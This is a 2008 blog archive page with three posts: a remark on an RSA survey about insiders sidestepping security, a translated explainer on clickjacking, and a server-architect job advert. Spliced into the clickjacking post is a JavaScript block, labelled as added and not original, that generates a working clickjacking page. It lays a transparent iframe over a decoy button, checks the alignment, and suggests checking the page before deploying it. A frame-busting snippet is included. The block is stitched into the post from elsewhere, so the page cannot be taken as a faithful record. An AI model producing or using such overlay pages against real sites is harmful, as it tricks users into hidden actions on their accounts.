Archive

Archive for October 16th, 2008

Insiders dodge security for productivity, RSA says

October 16th, 2008 2 comments

In a recent survey, RSA found that insiders dodge security for productivity. I agree that it is very common at a company for workers and employees to share a computer or share some accounts. It might be an acceptable compromise for a non-critical, non-sensitive IT environment in order to save costs. Anyway, in most cases it violates best practice and should be corrected.

Categories: -English-, Security

[Chinese] Clickjacking attack

October 16th, 2008 2 comments

SecurityFocus reported a new type of web-based attack: clickjacking. In short, the attacker exploits the fact that what the browser actually renders for a click can differ from what the user believes they are clicking, and uses this to lead the user into performing the click or input the attacker wants. Buttons, images, forms, links and so on can all be used to carry out this attack. With careful design, an attacker can use clickjacking to take control of the victim's camera and microphone. According to the report, several current mainstream browsers, such as IE, Chrome, Safari and Opera, are all affected. A Firefox 3.0 extension, NoScript, can help protect against this attack.

Hansen and Grossman, who discovered the technique, gave it the name Clickjacking (click hijacking), which is quite vivid: a deceptive form of hijacking. It is more covert and deceptive than simple phishing based on domain-name spoofing.

Google led me to a good write-up on the Duba (毒霸) blog. Some excerpts follow:

Simply put, Clickjacking is an attack, a new type of web attack. The "Flash Player vulnerability" mentioned above is actually just one manifestation of the Clickjacking security issue.

Clickjacking can be understood by splitting it into click-jacking: click means a mouse click, and jacking should mean hijacking (an abbreviation of hijacking? hard to say). Put together it translates as "click hijacking". Another name for Clickjacking comes up here too: they call it "UI redress vulnerabilities", and that description perhaps explains the nature of the vulnerability more clearly.

From a published clickjacking demo it is not hard to see what clickjacking involves.

In page A, which you control, there is an iframe whose src points to page B on another domain. Set the iframe's CSS opacity to 0 and give it a z-index larger than that of page A's other elements. Set the iframe's width and height large enough that the user can click the content inside it (page B's content). Then place on page A some buttons, links and other elements that can trick the user into clicking; these elements lie beneath the iframe (as determined by z-index) and are positioned exactly where the key elements of page B inside the iframe are. So when the user is tricked into clicking these elements on page A, they actually click the key elements in page B. As for what page B's key elements are, you can imagine them: delete buttons, add buttons, radio buttons, request links and so on. With some social-engineering tricks, this kind of attack can be carried out very elegantly. The attack is based on DHTML and uses an iframe, and it does not necessarily require JavaScript.

In fact this kind of deception has existed for a long time; likewise, three click-hijacking methods are listed here (onMouseUpJacking, FormJacking, SubmitJacking).

If a hacker carefully designs a clickjacking attack page, a visitor's ordinary mouse clicks, or even accidental ones, may trigger a hidden action behind the page, including downloading a trojan or other actions (such as opening the camera).
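The overlay described in the excerpt above (a page A that loads page B in an iframe with opacity 0 and a higher z-index, positioned so B's sensitive control sits exactly under the decoy button) can be written down as a small generator. The following is an added example, not code from the original post or from the Duba blog it quotes; the victim URL, the element coordinates and sizes, and the decoy label are constructed assumptions. It also computes the iframe offset that makes the two rectangles coincide, checks that the hidden control actually lies inside the frame, and shows the frame-busting script page B could include as the contemporary countermeasure.

```javascript
// Added example, not from the original page: builds the clickjacking decoy
// page A described in the excerpt. The victim page, coordinates and label are
// constructed assumptions for illustration only.

// Sensitive control inside victim page B: position and size in CSS pixels,
// measured from B's top-left corner (assumed layout of the victim page).
const victimControl = {
  url: "https://victim.example/account/settings",
  x: 420, y: 310, w: 90, h: 28,
};

// The decoy button the visitor sees in page A (assumed position and size).
const decoyButton = { x: 200, y: 150, w: 90, h: 28, label: "Click to continue" };

// Size of the transparent iframe. It must be large enough that the control
// inside B is within the frame's viewport, otherwise the click lands on nothing.
const FRAME = { width: 1024, height: 768 };

// Offset for the iframe so that point (control.x, control.y) of page B lands
// exactly at (decoy.x, decoy.y) of page A.
function iframeOffset(control, decoy) {
  return { left: decoy.x - control.x, top: decoy.y - control.y };
}

// True when every click on the visible decoy maps onto the hidden control:
// the control must fit inside the frame, and since iframeOffset() aligns the
// two top-left corners, the decoy must be no larger than the control.
function decoyCoversControl(control, decoy, frame = FRAME) {
  const insideFrame =
    control.x + control.w <= frame.width && control.y + control.h <= frame.height;
  return insideFrame && decoy.w <= control.w && decoy.h <= control.h;
}

// Page A as described: the decoy button sits at z-index 1, the iframe with
// page B sits above it at z-index 2 with opacity 0. An opacity-0 element is
// invisible but still receives pointer events, which is what makes this work.
// No script is needed on page A at all.
function buildClickjackPage(control, decoy, frame = FRAME) {
  const off = iframeOffset(control, decoy);
  return [
    "<!DOCTYPE html>",
    '<html><body style="position:relative;margin:0">',
    `<button style="position:absolute;left:${decoy.x}px;top:${decoy.y}px;` +
      `width:${decoy.w}px;height:${decoy.h}px;z-index:1">${decoy.label}</button>`,
    `<iframe src="${control.url}" style="position:absolute;left:${off.left}px;top:${off.top}px;` +
      `width:${frame.width}px;height:${frame.height}px;opacity:0;z-index:2;border:0"></iframe>`,
    "</body></html>",
  ].join("\n");
}

// Countermeasure for page B, as commonly deployed at the time: refuse to be
// rendered inside another page's frame. Simple frame-busting of this kind can
// be defeated by a hostile parent page, so treat it as a first layer only.
function frameBustingSnippet() {
  return "<script>if (top !== self) { top.location = self.location; }</script>";
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(buildClickjackPage(victimControl, decoyButton));
  console.log(frameBustingSnippet());
}
```

Saving the generated page and opening it in a 2008-era browser shows only the decoy button; the click goes to the invisible frame on top. `decoyCoversControl` is the check to run before deploying such a page (or, defensively, when reasoning about which of your own controls are reachable this way): a control outside the frame or a decoy larger than its target means some clicks miss.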

Job Opportunity of Server Architect

October 16th, 2008 7 comments

There is a good job opportunity in our organization. If you are interested or have friends to recommend, please don't hesitate to contact me by sending the CV/resume to my email address (richard.zhaol at gmail dot com).

Job Description:

This is a senior technical position in the Global Infrastructure Department, under the CIO organization. It is an individual-contributor role, reporting directly to the Director of Architecture and Security Operations.

1. Lead the global roadmap and technology innovations related to server, storage and virtualization.
2. Lead the design of the overall architecture and standards for global server and storage.
3. Communicate with global business users and collect and analyze their requirements.
4. Design solutions that meet the business requirements, with support from SMEs (subject matter experts) in the operation towers.
5. Lead the design and definition of technical manuals and templates used for operational enhancements and changes.

Requirements:

1. Bachelor's degree in Computer Science or Electrical Engineering with very good academic performance (Master's/PhD a plus).
2. Minimum 10 years' working experience as an IT operations/consulting engineer or architect, minimum 5 years of IT system design experience, minimum 3 years of large-scale server and storage system design experience.
3. Strong technical background in related fields, i.e. networking, telecom and security technologies (ITIL experience is a plus).
4. Good communication skills. Good written and spoken English; able to give technical talks and presentations in English.

Categories: -English-, Architect